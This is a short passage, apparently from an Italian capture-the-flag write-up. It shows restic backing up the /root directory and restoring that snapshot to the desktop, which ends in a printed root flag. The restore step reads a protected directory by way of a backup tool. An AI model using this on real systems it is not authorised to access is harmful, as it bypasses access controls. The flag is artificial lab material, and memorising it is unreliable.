630scan [/root] [0:00] 10 directories, 14 files, 28.066 KiB scanned 10 directories, 14 files in 0:00 [0:00] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00 duration: 0:00 snapshot 4d72521f saved snapshot 4d72521f saved
631
632ripristiniamo il backup sul desktop
633restic -r /root/Desktop/restic/bolt/ restore 4d72521f --target /root/Desktop/
634
635FLAG ROOT
636ntrkzgnkotaxyju0ntrinda4yzbkztgw